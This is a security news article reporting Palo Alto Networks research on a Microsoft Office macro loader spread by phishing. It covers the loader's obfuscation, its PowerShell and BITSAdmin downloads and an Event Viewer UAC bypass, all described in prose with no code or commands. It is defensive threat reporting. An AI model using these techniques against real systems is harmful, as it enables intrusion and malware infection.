Security Experts:

Connect with us

Hi, what are you looking for?


Malware & Threats

Office Loader Uses Macros to Drop Array of Malware

A recently discovered Microsoft Office loader uses malicious macros to drop multiple malware families, Palo Alto Networks security researchers warn.

A recently discovered Microsoft Office loader uses malicious macros to drop multiple malware families, Palo Alto Networks security researchers warn.

More than 650 unique samples of this loader have been observed since initial detection in early December 2016, accounting for 12,000 malicious sessions targeting numerous industries. The loader, researchers say, is being delivered via email and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to compromise targeted systems.

The roughly 12,000 phishing email runs distributing the loader used a variety of subject lines, claiming to be purchase orders, requests for quotation, purchase enquiries, and email verification notifications, among others. The attached malicious documents were masquerading as invoices, product lists, deposit slips, or document scans, and more.

High Tech, Professional and Legal Services, and Government were some of the most affected industries, Palo Alto Networks says. However, the distribution campaigns leveraging this loader have been targeting other sectors as well, including Wholesale, Telecoms, and Services.

Some of the malware families dropped using this loader included LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.

“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns,” the security researchers say.

The loader uses malicious macros that have been obfuscated using a large amount of garbage code and randomly chosen variables, which led researchers to believe that a builder was used to generate them. The second part of the malicious macro, researchers say, includes not only garbage code, but also obfuscated strings and a number of strings written to the Word document and which are in-line with the ploy used by the attacker, based on the subject line and filename.

The first half of the macro, on the other hand, includes a function to decode the obfuscated strings, after which they are called with a PowerShell command. To decode the strings, the macro simply removes characters present within a blacklist string. However, researchers say that only about half of the samples contained decoy information.

One of the decoded functions was meant to download a payload via PowerShell and then drop it within the %TEMP% directory. The macro would also create a registry key to point to the dropped file, while also abusing Windows Event Viewer to bypass UAC and elevate its privileges. The dropped file is then removed.

The UAC bypass was first detailed in August 2016, and was recently used in various campaigns, including some focused on the distribution of ransomware.

A small set of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware. The technique was associated with 11 samples that were spotted in early December, when the loader first appeared. However, the attackers switched to PowerShell.

“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns. It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families,” Palo Alto researchers conclude.

Related: Macro Malware Comes to macOS

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.


CISA, NSA, and MS-ISAC issued an alert on the malicious use of RMM software to steal money from bank accounts.


Chinese threat actor DragonSpark has been using the SparkRAT open source backdoor in attacks targeting East Asian organizations.

Application Security

Electric car maker Tesla is using the annual Pwn2Own hacker contest to incentivize security researchers to showcase complex exploit chains that can lead to...

Malware & Threats

Norway‎-based DNV said a ransomware attack on its ship management software impacted 1,000 vessels.

Malware & Threats

Cybercrime in 2017 was a tumultuous year "full of twists and turns", with new (but old) infection methods, a major return to social engineering,...

Malware & Threats

Fortinet warned of three malicious PyPI packages containing code that fetches the Wacatac trojan and information stealer.


The recent ransomware attack targeting Rackspace was conducted by a cybercrime group named Play using a new exploitation method, the cloud company revealed this...